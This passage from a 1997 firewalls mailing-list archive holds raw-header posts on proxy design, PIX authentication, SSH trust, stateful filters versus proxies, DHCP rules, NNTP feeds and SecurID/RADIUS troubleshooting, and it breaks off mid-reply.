cc: Bernd Eckenfels , firewalls@GreatCircle.COM Subject: Re: Plug-gw- One to many relationship In-Reply-To: <3.0.32.19970608233222.0096f100@the-wire.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > That's just my point. > Despite many people telling me the one-to-many has some magic > way of extracting the data lost in the many to one mapping. > > Yes, I've had people tell me no information is lost is the > mufti-hosts sharing one IP address. Just having NAT doesn't > work that magic. This is about incoming, not outgoing, plugs. > > Thanks, Brend, for restoring my confidence that someone > out there knows what I was talking about. > if anyone feels like coding, you can take the Host: parameter that most www browsers present. the syntax is/appears to be: GET Host: [many more arguments/capabilities] e.g. GET / HTTP/1.0 Host: foo.bar.com:3002 I don't think that it would be horribly difficult to code a proxy and/or hack http-gw (or something else) to read the first line, save it, grab the second line, shoot it at the desired host and/or port. the latter part should be simple for your usage as you have a different internal mapping of host/ip's than the external one, so the f/w can use the relevant internal ones for this usage. -- craig ------------------------------------------------------------------------------- Craig I. Hagan "It's a small world, but I wouldn't want to back it up" hagan@cih.com "True hackers don't die, their ttl expires" "It takes a village to raise an idiot, but an idiot can raze a village" From owner-firewalls-outgoing Mon Jun 9 20:36:41 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id QAA01099 for firewalls-outgoing; Mon, 9 Jun 1997 16:04:08 -0700 (PDT) Received: from inet03.citec.qld.gov.au (inet03.citec.qld.gov.au [203.5.10.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id QAA00872 for ; Mon, 9 Jun 1997 16:03:16 -0700 (PDT) Received: by inet03.citec.qld.gov.au; id JAA00101; Tue, 10 Jun 1997 09:03:58 +1000 Received: from guru.citec.qld.gov.au(147.132.20.47) by inet03.citec.qld.gov.au via smap (3.2) id xma000032; Tue, 10 Jun 97 09:03:44 +1000 Received: (from sgcccdc@localhost) by guru.citec.qld.gov.au (8.6.12/8.6.12) id JAA15912 for firewalls@greatcircle.com; Tue, 10 Jun 1997 09:06:34 +1000 From: Colin Campbell Message-Id: <199706092306.JAA15912@guru.citec.qld.gov.au> Subject: PIX http authentication question To: firewalls@greatcircle.com Date: Tue, 10 Jun 1997 09:06:33 +1000 (EST) X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, Would someone knowledgeable (or otherwise :-) care to enlighten me (and possibly others) on how the PIX authenticates users of the HTTP protocol. My understanding so far .... On receiving an HTTP packet from a host (not user) the PIX looks to see if one has already been received an the host (not user) has autheticated. If so and the configurable timeout has not expired, the packet flows. If not ... Send something back to the browser to indiacte that the user must supply some authetication. The browser then sends something back which the PIX interprets as authentication information, checks the database and allows or denies access to the IP address from which the packets came. It is this process in which I need more information. There seem to be several shortcomings on this sort of authentication based on IP. Consider sites using DHCP. It is possible that someone not allowed internet access (it happens) gets a free IP that is (by virtue of the fact the previous user authenticated). Same thing goes for dialup users getting a previously authenticated IP with time still left on the Pix meter. Consider multi-user hosts. Only the first person through the firewall needs to authenticate - everyone else travels on that same "ticket". This last point tends to indicate that the browser sends nothing to the PIX in the normal HTTP stream and that the authentication is done by a separate application (Java?) on the user's machine. This then brings problmes with people running Lynx (there are some still) or hosts not supported by PIX's "authentication client". Waiting for info ... Colin From owner-firewalls-outgoing Mon Jun 9 21:12:28 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA15216 for firewalls-outgoing; Mon, 9 Jun 1997 14:26:54 -0700 (PDT) Received: from mail.ruhrgebiet.individual.net (in-ruhr.ruhr.de [141.39.224.38]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id OAA15204 for ; Mon, 9 Jun 1997 14:26:43 -0700 (PDT) Received: (from admin@localhost) by mail.ruhrgebiet.individual.net (8.8.5/8.8.5) with UUCP id WAA20062 for firewalls@GreatCircle.COM; Mon, 9 Jun 1997 22:26:18 +0200 (MET DST) Received: from hostname.devnull.ruhr.de (benedikt@hostname.devnull.ruhr.de [192.168.122.11]) by devnull.local.net (8.6.12/8.6.9) with ESMTP id KAA01286 for ; Mon, 9 Jun 1997 10:31:27 +0200 Received: (from benedikt@localhost) by hostname.devnull.ruhr.de (8.7.5/8.7.3) id KAA00477; Mon, 9 Jun 1997 10:47:46 +0200 To: firewalls@GreatCircle.COM Subject: Re: ssh proxy for fwtk References: <199706060134.SAA01939@mail.marben.com> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit From: Benedikt Stockebrand Date: 09 Jun 1997 10:47:45 +0200 In-Reply-To: girsch@marben.com's message of Thu, 5 Jun 1997 18:34:53 -0700 (PDT) Message-ID: <87raec9n7y.fsf@devnull.ruhr.de> Lines: 32 X-Mailer: Gnus v5.3/Emacs 19.34 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk girsch@marben.com (Arnaud Girsch) writes: > > I'm not sure, but what about this one: If the remote machine has been > > hacked, then X forwarding can be more of a problem than help. If the > > remote sshd (or /bin/*sh or whatever) has been modified to use that X > > forwarding they're just about right in your local machine. And you > > can't even tell because you'd need your local users private key to > > decrypt things to analyze them. > > In any case, SSH is based on a double trust of both hosts. If one of the hosts > is compromised, you might be exposed to brakeins. Not quite---primarily the host running the server is trusting the host running the client but not the other way round. If I ssh into a remote machine I only execute things on that remote machine, so in theory only the remote machine should be vulnerable to any attack, not the local one where the connection originated. If the local machine got hacked it can hose the remote one but not the other way. In practice the problem isn't limited to X11 forwarding but also to dangerous terminal capabilities like keyboard redefinition. But this seems less unexpected to me and is also limited to the window(s) I run the ssh client in. Ben -- Ben(edikt)? Stockebrand Runaway ping.de Admin---Never Ever Trust Old Friends My name and email address are not to be added to any list used for advertising purposes. Any sender of unsolicited advertisement e-mail to this address im- plicitly agrees to pay a DM 500 fee to the recipient for proofreading services. From owner-firewalls-outgoing Mon Jun 9 21:46:39 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA22882 for firewalls-outgoing; Mon, 9 Jun 1997 17:45:20 -0700 (PDT) Received: from mail.clark.net (mail.clark.net [168.143.0.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id RAA22658 for ; Mon, 9 Jun 1997 17:44:39 -0700 (PDT) Received: from explorer2.clark.net (proberts@explorer2.clark.net [168.143.0.5]) by mail.clark.net (8.8.5/8.6.5) with ESMTP id UAA17829; Mon, 9 Jun 1997 20:44:53 -0400 (EDT) Received: from localhost (proberts@localhost) by explorer2.clark.net (8.8.5/8.7.1) with SMTP id UAA00350; Mon, 9 Jun 1997 20:45:25 -0400 (EDT) X-Authentication-Warning: explorer2.clark.net: proberts owned process doing -bs Date: Mon, 9 Jun 1997 20:45:25 -0400 (EDT) From: "Paul D. Robertson" Reply-To: "Paul D. Robertson" To: Ryan Russell/SYBASE cc: firewalls Subject: Re: Stateful Packet Filters vs. Proxies In-Reply-To: <199706092304.QAA28395@notesgw2.sybase.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On 9 Jun 1997, Ryan Russell/SYBASE wrote: > >This means that NT machines behind SPFs are vulnerable to "Son of OOB" > >type attacks, not so proxy protected machines behind a non-NT proxy. > > A proxy would have to written specifically to handle the OOB problem, > it would not be handled automatically. It would probably be easier Wrong, the protections of a "hardened host" for OOB problems are included because you aren't passing the problem to the other hosts. One machine, or several thousasand, I know which I find easier to keep updated and protected. > to modify the SPF to catch it, actually. Imagine if you were using the > host OS, and your proxy depended to some degree on the NetBIOS > over TCP implementation in NT - then your proxy would get nailed > by the OOB attack, and not the inside machine. 1. I said "non-NT" firewall, in which case I'm *not* nailed. 2. I said "Son of OOB", which is pertinent to *any* TCP connection with NT, _not_ just NetBIOS services. It's not a proxy issue because it's a lower level attack, since the proxy handles all outbound connections, and doesn't pass packets through, it is the only machine on the network that needs to not be vulnerable to the attack. > In general, a proxy will not protect you against attacks > that didn't exist or weren't know at the time it was written. In this case, since the attack is against the stack of the clients, and not the firewall itself, or an application, my proxy protects me where SPF doesn't protect you. Paul ----------------------------------------------------------------------------- Paul D. Robertson "My statements in this message are personal opinions proberts@clark.net which may have no basis whatsoever in fact." PSB#9280 From owner-firewalls-outgoing Mon Jun 9 21:57:50 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id UAA29854 for firewalls-outgoing; Mon, 9 Jun 1997 20:44:40 -0700 (PDT) Received: from unixpac10.unixpac.com.au (unixpac10.unixpac.com.au [203.3.121.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id UAA29747 for ; Mon, 9 Jun 1997 20:44:18 -0700 (PDT) Received: from unix10.unixpac.com.au by unixpac10.unixpac.com.au via smtpd (for honor.greatcircle.com [198.102.244.44]) with SMTP; 10 Jun 1997 03:57:40 UT Received: from www.jlabs.com (unixpac1.unixpac.com.au [192.168.200.177]) by unix10.unixpac.com.au (8.8.2/8.8.2) with SMTP id NAA28599 for ; Tue, 10 Jun 1997 13:46:40 +1000 (EST) To: firewalls@greatcircle.com Path: newsmaster From: geoffb@NOJUNKunixpac.com.au (Geoff Breach) Newsgroups: unixpac.lists.firewalls Subject: Re: Simple firewall? Date: Tue, 10 Jun 1997 03:44:55 GMT Organization: Unixpac Pty Ltd, Sydney, Australia, +612 9953 8366 Lines: 19 Message-ID: <339ccce7.683444814@news> References: <01A1542B@MHS> NNTP-Posting-Host: disney.unixpac.com.au X-Newsreader: Forte Free Agent 1.1/32.230 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 09 Jun 1997 22:31:43 -0400, Brown_Michael_K@bns.attmail.com wrote: >If someone just wants to only allow email into their network, perform >NAT(since they are not registered legal internal addresses) and allow >internal users to surf the internet using http, what is the most >economical and still secure way/product to do this? Whistle Interjet? All you ask for plus public and private web and ftp sites, file server, mailing list management, DHCP, WINS, DNS, SMB, etc, etc, etc. Security wise: It's based on FreeBSD, ipfw and GateD. It's essentially a packet filtering, address hiding router. http://www.unixpac.com.au/vendors/whistle/index.html HTH, Geoff From owner-firewalls-outgoing Mon Jun 9 22:10:40 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id UAA19743 for firewalls-outgoing; Mon, 9 Jun 1997 20:02:16 -0700 (PDT) Received: from unixpac10.unixpac.com.au (unixpac10.unixpac.com.au [203.3.121.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id UAA19710 for ; Mon, 9 Jun 1997 20:02:05 -0700 (PDT) Received: from unix10.unixpac.com.au by unixpac10.unixpac.com.au via smtpd (for honor.greatcircle.com [198.102.244.44]) with SMTP; 10 Jun 1997 03:15:26 UT Received: from www.jlabs.com (unixpac1.unixpac.com.au [192.168.200.177]) by unix10.unixpac.com.au (8.8.2/8.8.2) with SMTP id NAA27910 for ; Tue, 10 Jun 1997 13:04:23 +1000 (EST) To: firewalls@greatcircle.com Path: newsmaster From: geoffb@NOJUNKunixpac.com.au (Geoff Breach) Newsgroups: unixpac.lists.firewalls Subject: Re: DHCP and Firewall 1 Date: Tue, 10 Jun 1997 03:02:38 GMT Organization: Unixpac Pty Ltd, Sydney, Australia, +612 9953 8366 Lines: 25 Message-ID: <339cc303.680912366@news> References: <9706092044.AA02756@ny_nx_mail1.ncmi-gsl.com> NNTP-Posting-Host: disney.unixpac.com.au X-Newsreader: Forte Free Agent 1.1/32.230 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 9 Jun 97 16:44:44 -0400, donaldb@ncmi-ny.com (Donald Branch) wrote: >I have a Windows NT machine running DHCP I want to be able from >that one machine to be able to get out to AOL but since it's ip >address keeps changing I can't make a rule based on his ip address. >keeps changing Only one way. Keep it's IP address from changing. If you configure your DHCP server to always hand out the same address to that machine's MAC address, you get a middle ground between the benefits of DHCP and the benefits of fixed addressing. You still get all the nice information handout features of DHCP (default gw, DNS servers, etc,etc), you get central control over addressing and all that info, and you get fixed addresses for the benefit of fine-grained control over what individual boxen do through your firewall. Yeah, there are other ways, authenticate, etc, but too much trouble IMHO. HTH Geoff From owner-firewalls-outgoing Mon Jun 9 22:26:44 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id SAA07810 for firewalls-outgoing; Mon, 9 Jun 1997 18:53:52 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id SAA07509 for ; Mon, 9 Jun 1997 18:52:52 -0700 (PDT) Received: from apu.rcp.net.pe (apu.rcp.net.pe [161.132.5.16]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with SMTP id SAA26457 for ; Mon, 9 Jun 1997 18:28:34 -0700 (PDT) Received: by apu.rcp.net.pe via sendmail with stdio id for firewalls@greatcircle.com; Mon, 9 Jun 1997 20:20:15 -0400 (EDT) (Smail-3.2 1996-Jul-4 #1 built 1996-Sep-16) Message-Id: From: vadillo@apu.rcp.net.pe (Enrique Vadillo) Subject: SecurID and Cisco? To: firewalls@greatcircle.com Date: Mon, 9 Jun 1997 20:20:15 -0400 (EDT) PGP-FingerPrint: 55 B9 83 D2 61 71 E6 6B 1E CE FD B5 F7 AA F1 B5 X-Mailer: ELM [version 2.4ME+ PL22 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all, Sorry if this can look kinda off-topic. I am trying to obtain SecurID dialup authentication working thru Cisco 2511. I am using a Solaris Box as radiusd server (Latest Ascend's radiusd compiled with ACE libs) and ACE Server (SecurID) host too. Authentication using the "UNIX Client" works fine. BTW i am using user-defined PIN numbers. The problem appears only with the "Communications Client". I have inserted in the '/etc/raddb/users' file the following lines: aceuser Password = "ACE" User-Service-Type = Framed-User In my Cisco the Solaris box is defined as the radius server. When i try to authenticate using a "Communications Client" (My Solaris again), i execute "/etc/radiusd -s -x" and for an 'aceusr' login attempt in my Cisco 2511 i get the following message: Jun 10 01:51:01.744 radiusd[2149] Debugging enabled Jun 10 01:51:01.760 radiusd[2149] config_init: dict_valfind(Lifetime-In-Days) failed Jun 10 01:51:39.622 radiusd[2149] New request: securid.1645, id=49 Jun 10 01:51:39.624 radiusd[2149] handle_radius_request: securid.1645, id=49, code=1, length=75 request: Client-Id = 161.132.6.134 <<=== THIS IS MY CISCO 2511 request: Client-Port-Id = 18 request: User-Name = "aceusr" request: Calling-Station-Id = "200.1.182.200" <<=== THIS IS THE REMOTE HOST request: Password = "\025\263\213\215+\226r\332\342=\017\341\302\306];" Jun 10 01:51:39.628 radiusd[2149] rad_authenticate Jun 10 01:51:39.639 radiusd[2149] User record PASSWORD type is Token Jun 10 01:51:39.640 radiusd[2149] authPapPwd Jun 10 01:51:39.641 radiusd[2149] ace_pass: FAILED: no state attribute Jun 10 01:51:39.644 radiusd[2149] ace_pass: securid.1645, id=49: FAILED for user `aceusr' Jun 10 01:51:39.646 radiusd[2149] send_reject: securid.1645, id=49 Of course 'aceusr' is included in the "User Activation List" for this client. has anyone out there succeeded running SecurID using Cisco? Enrique Vadillo- From owner-firewalls-outgoing Mon Jun 9 22:53:50 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA23725 for firewalls-outgoing; Mon, 9 Jun 1997 17:49:01 -0700 (PDT) Received: from unixpac10.unixpac.com.au (unixpac10.unixpac.com.au [203.3.121.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id RAA23649 for ; Mon, 9 Jun 1997 17:48:41 -0700 (PDT) Received: from unix10.unixpac.com.au by unixpac10.unixpac.com.au via smtpd (for honor.greatcircle.com [198.102.244.44]) with SMTP; 10 Jun 1997 01:02:00 UT Received: from www.jlabs.com (unixpac1.unixpac.com.au [192.168.200.177]) by unix10.unixpac.com.au (8.8.2/8.8.2) with SMTP id KAA25861 for ; Tue, 10 Jun 1997 10:51:00 +1000 (EST) To: firewalls@greatcircle.com Path: newsmaster From: geoffb@NOJUNKunixpac.com.au (Geoff Breach) Newsgroups: unixpac.lists.firewalls Subject: Re: NNTP server in DMZ? Date: Tue, 10 Jun 1997 00:49:13 GMT Organization: Unixpac Pty Ltd, Sydney, Australia, +612 9953 8366 Lines: 52 Message-ID: <339ca21f.672491035@news> References: <3.0.2.32.19970607194048.029fd084@localhost> NNTP-Posting-Host: disney.unixpac.com.au X-Newsreader: Forte Free Agent 1.1/32.230 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sat, 07 Jun 1997 19:40:48 -0400, timh@nac.net ("Timothy D.J. Hunt") wrote: >At 07:55 AM 6/5/97 -0500, Joe Doetzl wrote: >>I have a customer who wishes to install a NNTP server. It is likely >>that they will host internal newsgroups that will need to be protected. >The problem with the standard news feed is that the standard "IHAVE" >protocol is a "push" feed >with the sender connecting to your server. For this to work, your >news server would need to be in the DMZ. The other catch with a "push" feed in both directions is that, unless your ISP sets up some means for you to control the feed (gup, etc) then you need to call them each time you want changes, etc. A "pull" feed is arguably harder on the server you're pulling from than allowing it to feed you at will, but it's more secure, and gives you control over what you get, *and* gets you out of your ISP's hair. I've just set up an INN-like server (Nutscrape) on my internal network, but 'cos my ISP didn't get his act together quick enough, I wrote my own pull feed. One perl script that reads the active file for a list of what it should go get, then calls nntpget for each newsgroup with date/time parameters it gets from it's own database forms the basis of the down "pull". A second script reads the spool list for the upstream news server (that INN tries to contact, but cannot) and plucks out the articles from the local spool and posts them back upstream aka regular nntp client. Security wise, the INN server sits on my internal RFC1597 network, and the firewall and router have been configured to allow NNTP client access from only the internal news server and to only my ISP's news server. The firewall uses a simple plug-gw like proxy to pass the traffic. Feels nice and safe to me, and it works, with maybe a 5 min delay before the postings hit the street, which is pretty much standard anyway... For what my opinion is worth, the Nutscrape News Server seems pretty brain dead and inconfigurable to me, but the one thing I did like was it sent all that recent rash of "cmsg sendsys" and "send-me-your-passwd-file" control postings to me and said "Do we really wanna send our passwd file to this guy?" out of the box :-) HTH Geoff From owner-firewalls-outgoing Mon Jun 9 22:55:57 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA08114 for firewalls-outgoing; Mon, 9 Jun 1997 13:39:58 -0700 (PDT) Received: from mail.clark.net (mail.clark.net [168.143.0.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA08048 for ; Mon, 9 Jun 1997 13:39:33 -0700 (PDT) Received: from clark.net (proberts@explorer.clark.net [168.143.0.7]) by mail.clark.net (8.8.5/8.6.5) with ESMTP id QAA22102; Mon, 9 Jun 1997 16:39:39 -0400 (EDT) Received: from localhost (proberts@localhost) by clark.net (8.8.5/8.7.1) with SMTP id QAA07652; Mon, 9 Jun 1997 16:40:06 -0400 (EDT) X-Authentication-Warning: clark.net: proberts owned process doing -bs Date: Mon, 9 Jun 1997 16:40:03 -0400 (EDT) From: "Paul D. Robertson" To: Ryan Russell/SYBASE cc: firewalls Subject: Re: Stateful Packet Filters vs. Proxies In-Reply-To: <199706092011.NAA18271@notesgw2.sybase.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On 9 Jun 1997, Ryan Russell/SYBASE wrote: > Yes, I don't believe the SPFs will fragment, keep > seperate window sizes, etc.. Unless the layer 2 networks > on each size are significantly different. This means that NT machines behind SPFs are vulnerable to "Son of OOB" type attacks, not so proxy protected machines behind a non-NT proxy. > No, I don't think that there is anything an SPF > can block (in the data stream) that a proxy > can't. But, I will claim that the opposite is true, too. Covert channels in, leaking data in ICMP packets, which would require an proxy-aware version of say, ping, on an application layer gateway. Also, a whole class of DOS attacks against the stacks of the "protected" clients are what spring to my mind immediately. > A SPF has all the same access to a data stream > that a proxy does. One could write some SPF > code that would block applets. Would you > want to? Probably not. It would probably be easier > with a traditional proxy. Yes, and eventually, you'd have a real *mess* of code if you tried to mirror application layer functionality. Then think about verifying the implementation. If it's the first TCP fragment, and the sequence number is valid, and the window size is good, and the IP options aren't set, and we haven't seen a 
 tag, and it's text/html, and .....  

This sort of endless nested loop complexity is what you don't want in
security code.  Especially given the fact that you must protect against
attacks at multiple layers.  By the time you add enough to an SPF to
protect against all this, you've increased the level of complexity of the
code base by an order of magnitude, and you haven't gained any security 
over an application layer gateway because of it.

Yes, it's possible to add the same level of protection, but as you state,
it's probably something you wouldn't want to do.  Application layer
gateways gain those types of protections easily, understandably, and by
virtue of design, not by thousands of extra lines of code any one of which
could leave a hole.


Paul
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
proberts@clark.net      which may have no basis whatsoever in fact."
                                                                     PSB#9280


From owner-firewalls-outgoing  Mon Jun  9 23:11:16 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id PAA27756 for firewalls-outgoing; Mon, 9 Jun 1997 15:45:17 -0700 (PDT)
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id PAA27598 for ; Mon, 9 Jun 1997 15:44:40 -0700 (PDT)
Message-Id: <199706092244.PAA27598@honor.greatcircle.com>
Received: by cheops.anu.edu.au
	(1.37.109.16/16.2) id AA060735962; Tue, 10 Jun 1997 08:39:22 +1000
From: Darren Reed 
Subject: Re: Stateful Packet Filters vs. Proxies
To: mike.jones@unifiedtech.com (Mike Jones)
Date: Tue, 10 Jun 1997 08:39:21 +1000 (EST)
Cc: firewalls@GreatCircle.COM
In-Reply-To: <339C1C2E.F67342F@unifiedtech.com> from "Mike Jones" at Jun 9, 97 11:07:26 am
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In some mail from Mike Jones, sie said:
> 
> I'm not entirely sure what you're trying to say here. Why would
> you want Gauntlet to work with FW1? Is it that someone behind
> a FW1 could not ftp to a server behind a Gauntlet?

Ask those who were doing it.  Just more layers.

> Be that as it may, this was a bug and it was fixed. It was *not*
> a security hole, in that it did not permit something that should
> have been denied.

It was one instance of the bug.

> > The point being, FW1 doesn't try to recreate the upper layers of data
> > properly, so anything which doesn't fit in one packet requiers them to
> > provide "special case handling".  What they (and consumers) don't seem
> > to
> > realise that all of TCP is a "special case".  Consequently, thier
> > entire
> > suite of TCP proxies could be considered to be "flawed". 
> > If you're curious about "how", then look at the Linux FTP masquerade
> > code - it too looks for everything in one packet (when I last looked).
> 
> I don't follow you at all, I'm afraid. You're concluding that the
> entire product is flawed based on theoretically projecting one
> actual bug. I'm rather more interested in real security flaws. Your
> original message indicated multiple flaws and multiple cases
> pointing them out. This is a common claim, but whenever I've asked
> for details it always seems to turn into anecdotal evidence. I've
> always been a believer in the principle that the plural of "anecdote"
> is not "data", so I remain curious, but unconvinced.

Well, it strongly suggests that all of their TCP code (be it FTP/HTTP
or TELNET) is not written to handle cases where all the data it wants
to check is not in the same packet.

Whether or not that is a security flaw most likely will depend on your
firewall.  The area in which it has been observed to fail is when it
examines actual data (not TCP/IP headers) in packets.  When is that
needed and when isn't it ?  Depends on your firewall.  Given the original
description of the problem, with FTP, it is most likely trivial to find
other cases (or even the same) which cause the product to fail.

I guess this is a case of "if we had the source code, we could check to
see if it would or wouldn't work."  Instead we have to rely on Checkpoint's
marketing gloss.

If you've got a proper understanding of all that is involved with TCP/IP,
it's not hard to imagine how FW1 might "cheat" and how it could break down.
If nobody had ever had a problem, then we might never have known for sure,
but we have seen one case which therefore casts doubt over the rest of the
product.  This "cheating" I'd call a flaw - a flaw you don't have to even
wonder about when using traditional application proxies.

Darren

From owner-firewalls-outgoing  Mon Jun  9 23:25:23 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id UAA28257 for firewalls-outgoing; Mon, 9 Jun 1997 20:37:29 -0700 (PDT)
Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id UAA28079 for ; Mon, 9 Jun 1997 20:36:52 -0700 (PDT)
Received: from splinter.rtp.dg.com by dg-rtp.dg.com (5.4R3.10/dg-rtp-v02)
	id AA12736; Mon, 9 Jun 1997 23:37:41 -0400
Received: by splinter.rtp.dg.com (8.6.10/200.15.1.2)
	id XAA10392; Mon, 9 Jun 1997 23:38:17 -0400
From: spencerj@dg-rtp.dg.com (Jon Spencer)
Message-Id: <199706100338.XAA10392@splinter.rtp.dg.com>
Subject: Re: Ethical problems...
To: smoothy@videotron.ca (Smoothy)
Date: Mon, 9 Jun 1997 23:38:13 -0400 (EDT)
Cc: firewalls@greatcircle.com
In-Reply-To: <199706092040.QAA04207@bizet.videotron.net> from "Smoothy" at Jun 9, 97 04:44:01 pm
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

There need not be any conflicts between functionality and security goals of
the type illustrated below.  Whether there are or not depends upon the
technology employed on the firewall.

Using the example below, checking the email for a virus does indeed require
the decryption of the message.  Not only could you violate the
confidentiality of the message, you could also destroy the authenticity of
the sender (by messing with the digital signature).

The solution provided by CYBERSHIELD (actually provided by the underlying
B2 DG/UX OS) is to approach this in one of two manners.  Both are based
upon the principle of containment, which, simply stated, divides the system
into two parts:  that which exists for the subject, and that which does not
exist for the subject.  Arbitrary "containment areas" can be established.

(1) establish a containment area (CA) which no user or administrator can
    access.  Perform the decryption in that CA, and reencrypt the message
    prior to moving it out of that area.

    OR

(2) establish a containment area for receipt of network and/or email entities
    for each user.  Handle the mail in that CA.  This method allows for
    greater flexibility of personalization, better integrity and
    confidentiality of keys, etc.

In any event, an underlying high assurance protection approach is required
to ensure that the security goal is truly met and cannot be violated.  This
is certainly not the case for most firewall products, so the compilation of
the list is in general quite useful.

It will be interesting to see if you get any conflicts which can't be
eliminated by containment.  Flames from those who don't understand high
assurance or non-overridable security policies will be gleefully ignored! :-)

> 
> Hello,
> 
> I'm presently looking to establish which confusions all the security
> mechanisms can involve in opposition with the ethics.  If any ideas came =
> to
> your mind...would u please send it to my email address :
> smoothy@videotron.ca.
> 
> Example:  lot of firewalls need to desencrypt a mail for checking viruses
> in, but it's directly in opposition of the confidentiality.
> 
> Tx to all of u !
> 
> St=E9phane Routhier
> Bombardier Inc. Division Sea-Doo/Ski-doo
> =20
> 


-- 
Jon F. Spencer				spencerj@rtp.dg.com 
Data General Corp.			Phone : (919)248-6246
62 Alexander Drive, MS #119		FAX   : (919)248-6108
Research Triangle Park, NC  27709	Office RTP 121/9

	There is no such thing as a small interference with property.
			Andrew J. Galambos

	No success can compensate for failure in the home.
			President David O. McKay

***** UCC 1-207 ********

From owner-firewalls-outgoing  Tue Jun 10 00:04:54 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id SAA26980 for firewalls-outgoing; Mon, 9 Jun 1997 18:03:11 -0700 (PDT)
Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id SAA26973 for ; Mon, 9 Jun 1997 18:03:05 -0700 (PDT)
Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35])
          by halon.sybase.com (8.8.4/8.8.4) with SMTP
	  id SAA03276 for ; Mon, 9 Jun 1997 18:07:18 -0700 (PDT)
Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896)
	id AA22691; Mon, 9 Jun 97 18:05:08 PDT
Received: (from unixsvr1@localhost)
          by notesgw2.sybase.com (8.8.4/8.8.4)
	  id SAA04291 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Mon, 9 Jun 1997 18:03:56 -0700 (PDT)
Message-Id: <199706100103.SAA04291@notesgw2.sybase.com>
Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id
  860E878C7D5ACB0F882564B200059E48; Mon,  9 Jun 97 18:03:55 EDT
To: "Paul D. Robertson" 
Cc: firewalls 
From: Ryan Russell/SYBASE
  
Date:  9 Jun 97 18:10:39 EDT
Subject: Re: Stateful Packet Filters vs. Proxies
X-Lotus-Type: Reply All
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Just to clear up some of your misconceptions:

The son of OOB attack is application specific,
effecting only the Microsoft DNS server and the 
Microsoft Service at port 139 (which I think is the
NetBIOS port, not sure.)  It does not effect the
TCP driver in general.

The OOB flag is a perfectly legitimate flag, used by
a number of protocols, and a firewall of any type would have
had no reason to filter it until the attack was discovered.  
Any proxy for those services would quite happily pass
it on inside to any host in your network.

Think of it this way.. Say I discover that if I throw the
word "fred" into the datastream of an HTTP connection
Netscape will delete your harddrive.  You're telling me
that there are proxies out there that automatically
filter out the word fred?  Before I announce the attack?

That's gotta suck if you have a homepage, and your name
is fred.

    Ryan

P.S. Take a look here for an explaination of
What the Son of OOB bug is:

http://www.geek-girl.com/bugtraq/1997_2/0319.html



---------- Previous Message ----------
To: Ryan.Russell
cc: firewalls
From: proberts@clark.net ("Paul D. Robertson") @ smtp
Date: 06/09/97 08:45:25 PM
Subject: Re: Stateful Packet Filters vs. Proxies

On 9 Jun 1997, Ryan Russell/SYBASE wrote:

